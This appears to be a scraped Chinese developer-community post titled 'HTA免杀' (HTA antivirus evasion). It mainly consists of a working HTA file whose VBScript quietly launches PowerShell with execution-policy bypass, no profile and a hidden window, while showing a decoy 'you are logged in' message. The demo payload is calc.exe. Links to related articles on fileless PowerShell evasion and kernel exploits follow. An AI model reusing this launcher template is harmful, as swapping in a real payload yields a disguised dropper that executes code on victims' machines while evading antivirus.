<!--xhacker.hta-->
<html>
<head>
<title>CodeWorld</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<HTA:ApplicationID="oHTA" Applicationname="hta_app" border="thin" borderstyle="normal" icon="hello.ico" maximizebutton="yes" minimizebutton="yes" showintaskbar="no" singleinstance="no" sysmenu="yes" version="777" windowstate="normal" scroll="yes">
</head>
<body>
<center>
<br>
<h1>Code World Channel</h1>
<br>
<h2>您已经登录!请关闭窗口后操作!</h2>
<br>
</center>
<script language="VBScript">
Set Hackin = CreateObject("Wscript.Shell")
Set Check = CreateObject("Scripting.FileSystemObject")
If Check.FileExists(Split(Hackin.ExpandEnvironmentStrings("%PSModulePath%"),";")(1) + "\..\powershell.exe") Then
Hackin.Run "powershell.exe -exec bypass -nop -w hidden calc.exe"
// Hackin.Run "taskkill /f /im mshta.exe"
else
msgbox "Wrong operation, powershell.exe doesn't exist!"
End If
</script>
</body>
</html>HTA免杀
2017-08-25
1182
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《
阿里云开发者社区用户服务协议》和
《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写
侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:
CodeWorldCode World Channel您已经登录!请关闭窗口后操作!Set Hackin = CreateObject("Wscript.
目录
相关文章
|
开发工具
C语言
数据安全/隐私保护
|
网络协议
网络安全
Powershell免杀(无文件落地免杀)
无文件落地
顾名思义,无需将恶意文件传到目标服务器/机器上,直接利用powershell的特性加载到内存执行。为了在红队行动中更隐蔽的实施攻击以及横向移动,同时还可以解决目标不出网只能通过dns上线时的棘手问题,利用powershell可以避免一行行echo。
通过两种方式进行无文件落地的免杀,一种是出网的情况,另一种为不出网情况。
声明: 文章内容仅供网络安全爱好者学习使用,请勿用文章中提到的技术或工具做违法的事情,否则后果自负。
889
0
0
|
2月前
|
安全
数据安全/隐私保护
|
2月前
|
安全
Shell
|
7月前
|
开发框架
安全
.NET
|
11月前
|
安全
Windows
|
11月前
|
安全
数据安全/隐私保护
C++
|
11月前
|
安全
索引
Windows
干货丨windows内核www漏洞利用手法(修改版)
注:由于上次发出来的不完整,所以删除了重新发完整点的
前言:Gcow安全团队复眼小组致力于对漏洞的挖掘和研究,并且对于二进制和web漏洞方面都有所研究,有独立挖掘漏洞和独立复现漏洞的能力,本篇文章由Gcow安全团队复眼小组晏子霜师傅所写!
152
0
0
|
11月前
|
安全
Shell
API
|
11月前
|
数据安全/隐私保护